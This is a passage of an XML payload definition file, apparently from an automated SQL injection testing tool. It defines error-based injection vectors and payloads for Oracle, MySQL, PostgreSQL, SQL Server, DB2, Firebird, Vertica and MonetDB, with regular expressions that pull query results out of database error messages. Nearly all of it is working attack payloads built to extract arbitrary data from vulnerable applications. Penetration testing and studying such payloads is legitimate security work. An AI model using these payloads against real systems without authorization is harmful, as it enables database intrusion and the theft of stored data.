<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>\n        <stype>2</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n            <dbms_version>&gt;= 8.1.6</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n            <dbms_version>&gt;= 8.1.6</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird AND error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird OR error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MonetDB AND error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MonetDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MonetDB OR error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MonetDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Vertica AND error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>\n        <request>\n            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Vertica</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Vertica OR error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1</clause>\n        <where>2</where>\n        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>\n        <request>\n            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Vertica</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 AND error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 OR error-based - WHERE or HAVING clause</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <!--\n         TODO: if possible, add payload for SQLite, Microsoft Access,\n         and SAP MaxDB - no known techniques at this time\n    -->\n    <!-- End of error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->\n\n    <!-- Error-based tests - LIMIT clause -->\n    <test>\n        <title>MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,4,5</clause>\n        <where>1</where>\n        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>\n        <request>\n            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n    <!-- End of error-based tests - LIMIT clause -->\n\n    <!-- Error-based tests - Parameter replace -->\n    <test>\n        <title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n            -->\n            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.5 error-based - Parameter replace (EXP)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>\n        <request>\n            <payload>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>\n        <request>\n            <payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.6</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>\n        <request>\n            <payload>JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.7.8</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n            -->\n            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>\n            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>\n            -->\n            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>\n        <request>\n            <!-- These work as good as ELT(), but are longer\n            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>\n            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>\n            -->\n            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL error-based - Parameter replace</title>\n        <stype>2</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>\n        <request>\n            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>3</where>\n        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>\n        <request>\n            <payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>\n        <request>\n            <payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle error-based - Parameter replace</title>\n        <stype>2</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>\n        <request>\n            <payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird error-based - Parameter replace</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>\n        <request>\n            <payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 error-based - Parameter replace</title>\n        <stype>2</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>\n        <request>\n            <payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n    <!-- End of error-based tests - Parameter replace -->\n\n    <!-- Error-based tests - ORDER BY, GROUP BY clause -->\n    <test>\n        <title>MySQL &gt;= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>\n        <stype>2</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</vector>\n        <request>\n            <payload>,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</payload>\n        </request>\n        <response>\n            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.5</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.5 error-based - ORDER BY, GROUP BY clause 